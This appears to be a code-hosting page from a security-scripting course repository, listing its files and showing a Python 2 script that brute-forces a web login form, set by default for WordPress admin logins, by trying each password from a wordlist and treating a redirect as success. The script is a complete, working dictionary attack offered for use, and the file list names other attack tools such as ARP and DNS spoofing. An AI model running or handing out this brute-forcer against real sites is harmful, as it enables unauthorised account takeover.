• Search by Module
• Search by Words
• Search Projects

• Java
• Python
• JavaScript
• TypeScript
• C++
• Scala
• Blog

• SPSE-master
  • pdb_example.py
  • arp_scan.py
  • requests_xforce_API.py
  • search_duckduckgo.py
  • monitor_directory.py
  • lock_threads.py
  • monitor_process.py
  • threads2.py
  • xmasScan_threaded.py
  • tcpServer_signals.py
  • viper_shadowserver_module.py
  • search_scrape_parse_threaded.py
  • viper_xforce_module.py
  • ftp_signals_login_brute.py
  • xor_file.py
  • gatherThreatIntel_ISC_IPs.py
  • base_HTTP_server1.py
  • monitor_wifi_probes.py
  • dir_recurser.py
  • mysql_example.py
  • forker.py
  • dns_spoof.py
  • arp_spoof.py
  • user_exceptions.py
  • shodanSearch.py
  • mechanize_webform_sqli.py
  • pe_imports.py
  • requests_shadowserver_API.py
  • ez_base64.py
  • simple_HTTP_server1.py
  • requests_malwr_API.py
  • requests_viper_API.py
  • tcpServer_SocketServer.py
  • threads1.py
  • mechanize_webform_inspect.py
  • tcpClient_signals.py
  • synScan_threaded.py
  • monitor_tcp_ports.py
  • dirbuster.py
  • README.md
  • pythagoras.py
  • naive_bayes_classifier.py
  • usb_logs.py
  • signals.py
  • ftp_command_fuzzer.py
  • alexa_10000_domains.txt
  • requests_freegeoip_API.py
  • mechanize_webform_brute.py
  • LICENSE.txt
  • selenium_webdriver.py
  • windows_WirelessAccessPoint.py
  • mechanize_scraper_threaded.py
  • ftp_explorer.py

#/bin/python
# Default is set up for a wordpress admin form
import mechanize 
import logging
import time
from optparse import OptionParser
from urllib2 import HTTPError

form_username = 'log'
form_password = 'pwd'
form_submit = 'wp-submit'


def brute_server(server, user, password_list):
  br = mechanize.Browser()
  br.set_handle_equiv(False)
  br.set_handle_redirect(False)
  br.set_handle_referer(False)
  br.set_handle_robots(False)
  br.open(server)
  pass_list = open(password_list)
  for x in pass_list.readlines():
    try:  
      time.sleep(3)
      br.select_form( nr = 0 )
      br.form[form_username] = user
      br.form[form_password] = ''.join(x)
      print "Checking ",''.join(x)
      request = br.click(name=form_submit)
      response = br.open(request)
      if response.code == 200:
        print "No dice..."
    except HTTPError, e:
      if e.code == 302: # Redirect is our success case
	    print "Correct password is ",''.join(x)

		
def main():

  # Setup the command line arguments.
  optp = OptionParser()

  # Output verbosity options
  optp.add_option('-q', '--quiet', help='set logging to ERROR',
                  action='store_const', dest='loglevel',
                  const=logging.ERROR, default=logging.INFO)
  optp.add_option('-d', '--debug', help='set logging to DEBUG',
                  action='store_const', dest='loglevel',
                  const=logging.DEBUG, default=logging.INFO)
  optp.add_option('-v', '--verbose', help='set logging to COMM',
                  action='store_const', dest='loglevel',
                  const=5, default=logging.INFO)

  # Option for target web form to brute
  optp.add_option("-t", "--target", dest="target",
                  help="The target form to brute")
				  
  # Option for username to attack
  optp.add_option("-u", "--user", dest="user",
                  help="The username field of the form")
				  
  # Option for target web form to brute
  optp.add_option("-p", "--password", dest="password",
                  help="The password list to use in the dictionary attack")
				  
  opts, args = optp.parse_args()

  if opts.target is None:
    opts.target = raw_input("What is the target page with the form: ")
	
  if opts.user is None:
    opts.user = raw_input("What is the username to brute force: ")
	
  if opts.password is None:
    opts.password = raw_input("What is the password list file to use: ")
  
  # Setup logging.
  logging.basicConfig(level=opts.loglevel,
                      format='%(levelname)-8s %(message)s')


  # Main Event Loop:
  try:
    brute_server(opts.target, opts.user, opts.password)
  
  except (KeyboardInterrupt, EOFError) as e:
    print "Exiting..."
    exit(0)
	
  print "Completed Password List!"
  
if __name__ == '__main__':
  main()